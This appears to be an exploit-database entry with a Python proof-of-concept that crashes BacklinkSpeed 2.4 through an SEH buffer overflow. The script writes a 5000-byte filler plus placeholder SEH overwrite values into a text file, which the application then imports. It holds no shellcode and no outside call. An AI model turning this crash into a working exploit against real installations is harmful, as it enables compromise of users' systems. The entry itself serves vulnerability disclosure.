BacklinkSpeed 2.4 - Buffer Overflow PoC (SEH)

2021-02-18
ID: 104053
CVE: None
Download vulnerable application: None
# Exploit Title: 
# Date: 2020-08-01
# Exploit Author: Saeed reza Zamanian
# Vendor Homepage: http://www.dummysoftware.com
# Software Link: http://www.dummysoftware.com/backlinkspeed.html
# Version: 2.4
# Tested on: 
	Windows 10.0 x64 Build 10240
	Windows 7 x64
	Windows Vista x32 SP1
# Replicate Crash:
  1) Install and Run the application
  2) Run the exploit , the exploit create a text file named payload.txt
  3) Press import button and open payload.txt
  
#!/usr/bin/python
'''

	|----------------------------------|
	| SEH chain of thread 00000350	   |
	| Address    SE handler		   |
	| 42424242   *** CORRUPT ENTRY *** |
	|				   |
	| EIP : 43434343		   |
	|----------------------------------|
'''

nSEH = "BBBB"
SEH = "CCCC"
payload = "A"*5000+nSEH+"\x90\x90\x90\x90\x90\x90\x90\x90"+SEH

try:

    f=open("payload.txt","w")

    print("[+] Creating %s bytes payload." %len(payload))

    f.write(payload)

    f.close()

    print("[+] File created!")

except:

    print("File cannot be created.")
1-4-2 (www01)